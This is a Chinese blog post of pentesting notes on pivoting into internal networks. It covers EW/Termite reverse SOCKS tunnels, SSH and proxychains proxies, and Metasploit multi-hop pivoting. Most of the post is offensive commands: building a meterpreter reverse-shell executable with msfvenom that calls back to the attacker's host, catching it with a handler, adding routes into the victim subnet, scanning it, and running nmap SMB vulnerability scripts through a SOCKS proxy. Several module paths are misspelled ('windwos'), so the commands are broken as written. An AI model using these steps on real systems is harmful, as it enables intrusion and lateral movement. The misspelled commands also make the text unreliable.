devbox
Gausst松鼠会
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

内网安全-内网穿透

作者:Gausst松鼠会 | 2024-03-10 06:50:34

内网安全-内网穿透

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透

内网渗透

Nc使用详解
Nc监听和探测

Nc传文件

termite内网穿透工具

  1. 1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
  3. 2、
  4. 靶机监听流量转发:
  5.   ./ew_for_linux64 -s rcsocks -l 1111 -e 2222
  6.   #将1111端口监听到的本地数据转发到 web服务器的2222端口
  7.   # 通过1111端口,将本地流量转发出去
  8.   #rcsocks、rssocks 用于反向连接
  9.   #ssocks 用于正向连接
  10.   # -l 指定本地监听的端口
  11.   # -e 指定要反弹到的机器端口
  12.   # -d 指定要反弹到机器的IP
  13.   # -f 指定要主动连接的机器 ip
  14.   # -g 指定要主动连接的机器端口
  15.   # -t 指定超时时长,默认为 1000
  16.   
  17.   root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
  18. rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
  20. 监听机的流量转发:
  21. #将流量通过2222端口传到192.168.16.128主机上
  22. #rcsocks、rssocks 用于反向连接
  23.   #ssocks 用于正向连接
  24.   # -l 指定本地监听的端口
  25.   # -e 指定要反弹到的机器端口
  26.   # -d 指定要反弹到机器的IP
  27.   # -f 指定要主动连接的机器 ip
  28.   # -g 指定要主动连接的机器端口
  29.   # -t 指定超时时长,默认为 1000
  30.   
  31. 3、windows和linux差不多!
ssh代理内网穿透

正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!
ssh配置socket代理

  1. 1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
  2. 我们就可以直接使用本地流量进行攻击!
  3.  
  4. ┌──(root㉿ru)-[~/kali]
  5. └─# cat /etc/proxychains4.conf | grep "socks" | tail -1
  6. socks5  127.0.0.1 8081
  7.  
  8. 代理完成之后就可以使用本地流量进行内网信息收集了
MSF多级网络穿透

  1. 1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
  2. msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
  3. -p:指定payload
  4. -f:指定生成木马类型
  5.  
  6. 2、msfconsole 监听模块
  7. use exploit/multi/handler
  8. set payload windwos/meterpreter/reverse_tcp
  9. set lhost 本地监听IP
  10. set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
  11. 在web主机上运行shell.exe即可!
  12.  
  13. 3、添加内网静态路由
  14. run autoroute -s 内网IP网段
  15. 然后就可以扫描该网段了
  16. run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
  17. 当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)
  18.  
  19. 4、socks5代理
  20. 如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
  21. use auxiliary/server/socks_unc
  22. set srvhost 127.0.0.1
  23. set srvport 1234
  24. run
  25.  
  26. ┌──(root㉿ru)-[~/kali]
  27. └─# netstat -tnlp
  28. Active Internet connections (only servers)
  29. Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
  30. tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
  31. tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
  32. tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
  33. tcp6       0      0 :::22
  34.  
  35. ┌──(root㉿ru)-[~/kali]
  36. └─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
  37. socks5  127.0.0.1 1234
  38.  
  39. 这样我们就搞定了
  40. nmap:
  41. proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)
  42.  
  43. 在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!

                

        
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/217432
推荐阅读
相关标签
Copyright ©  2003-2013 www.wpsshop.cn  版权所有,并保留所有权利。

  
闽ICP备14008679号